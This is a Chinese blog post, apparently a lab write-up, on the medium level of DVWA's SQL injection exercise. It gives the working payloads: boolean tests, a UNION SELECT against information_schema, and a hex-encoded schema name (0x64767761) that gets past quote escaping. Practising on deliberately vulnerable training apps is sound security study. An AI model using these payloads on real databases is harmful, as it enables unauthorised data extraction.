首页 > 数据库 >dvwa-sql注入中级

dvwa-sql注入中级

时间:2024-11-06 22:42:27浏览次数:5  
标签:中级 ci dvwa general collate sql table schema

因为页面上只能选择相应数字查询,因此需要抓包进行注入;

首先通过语句判断是字符型还是数字型:

id=1 and 1=1--+

id=1 and 1=2--+

如图,两次返回结果不同,因此这是一个数字型注入。

然后依照流程爆出当前表列数和回显位,爆出当前数据库名字(这一步就省略了);

接着,要利用information_schema数据库爆出当前数据库下表名,会发现报错;

id=-1 collate utf8_general_ci union select 1,group_concat(table_name) collate utf8_general_ci from information_schema.tables where table_schema='dvwa'--+

错误信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''dvwa'--' at line 1

说明在‘dvwa’处的单引号’被进行了转义,于是可以将dvwa转换为十六进制进行绕过,转换结果是0x64767761;
注:为什么可以用十六进制进行绕过,十六进制常量会被视作一组字节,会根据当前数据库的字符集转化为对应字符,对应上table_schema字段的格式。

id=-1 collate utf8_general_ci union select 1,group_concat(table_name) collate utf8_general_ci from information_schema.tables where table_schema=0x64767761--+

成功报出表名,剩下的按部就班的爆出即可。

标签:中级,ci,dvwa,general,collate,sql,table,schema
From: https://www.cnblogs.com/NIGHTMESS/p/18531198

相关文章

  • python: more Layer Architecture and its Implementation in Python and sql server
    sqlserver:createtableSchool--創建表(SchoolIdchar(5)NOTNULLPRIMARYKEY,SchoolNamenvarchar(500)NOTNULLDEFAULT'',SchoolTelNovarchar(8)NULLDEFAULT'',);gomodel:#encoding:utf-8#版权所有......
  • Ubuntu Linux中安装MySQL教程
    在UbuntuLinux中安装MySQL步骤步骤一:更新软件包列表首先,更新你的软件包列表:sudoaptupdate步骤二:安装MySQL服务器使用以下命令安装MySQL服务器:sudoaptinstallmysql-server步骤三:启动MySQL服务安装完成后,启动MySQL服务:sudosystemctlstartmysql......
  • mysql 事务隔离级别
    在数据库中两个事务并发执行的时候会产生以下问题:脏读:当有事务修改了一条记录但未提交,另一事务读取该记录前后结果不一致不可重复读:当有事务修改了一条记录并且已经提交,另一事务前后读取该记录前后结果不一致幻读:当有事务新增了记录并且已经提交,另一事务中前后查出记录数不一......
  • mysql的 information_schema 数据库介绍
    information_schema是MySQL中的一个系统数据库,它提供了关于数据库元数据的信息。元数据是指描述数据库结构和内容的数据,例如表、列、索引、用户权限等。information_schema数据库是只读的,用户不能对其进行修改。位置information_schema数据库存在于每个MySQL实例中,不需要......
  • MySQL性能抖动
    当内存数据页跟磁盘数据页内容不一致的时,称这个内存页为“脏页”。内存数据写入磁盘后,内存和磁盘上的数据页的内容就一致了,称为“干净页”。平时执行很快的更新操作,就是在写内存和日志,而MySQL偶尔抖一下,可能是在刷脏页。刷脏页的时机redolog写满了,数据库停止所有更新操作,将......
  • DBeaver如何快速格式化sql语句,真简单!
    前言我之前在使用DBeaver的时候,一直不知道其可以格式化sql语句,导致sql语句看起来比较杂乱,今天就来介绍下DBeaver如何格式化sql语句。如何格式化sql语句首先,我们打开一个sql窗口,在里面输入我们要查询的sql语句,如图所示。可以看到,此时sql语句是比较杂乱的。然后,我们鼠标右击,选......
  • MySQL 删除数据 批量删除(大量)数据
    目录一、删除大表的部分数据二、删除带索引的表三、MySQL中的表的删除操作一、删除大表的部分数据一个表有1亿6000万的数据,有一个自增ID。最大值就是1亿6000万,需要删除大于250万以后的数据,有什么办法可以快速删除?看到mysql文档有一种解决方案:http://dev.mysql.com/doc......
  • SQL语法基础知识总结
    SQL(StructuredQueryLanguage)即结构化查询语言,是用于管理关系型数据库的标准语言。掌握SQL语法是操作数据库的关键,以下是SQL语法基础知识的详细总结。一、数据定义语言(DDL-DataDefinitionLanguage)1.创建数据库(CREATEDATABASE)用于创建一个新的数据库。例如,创建一......
  • MySQL 字符串索引和前缀索引
    前缀索引创建前缀索引altertabletaddindexidx_email(email);altertabletaddindexidx_email(email(6));使用前缀索引,定义好长度,可以做到即节省空间,又不用额外增加太多查询成本。区分度建立索引时,区分度(不重复的值)越高越好。selectcount(distanceemail)fromt......
  • 《SparkSQL--通过ThriftServer连接DataGrip》
    ThriftServer功能:类似于HiveServer2,负责解析客户端提交的SQL语句,转换成Spark的任务进行执行本质:Spark中的一个特殊的程序,利用程序的资源运行所有SQL,该程序除非手动关闭,否则一直运行 启动服务,该服务不会停止,一直在后台启动,假如启动不了,记得查看日志。/opt/installs/spark/sb......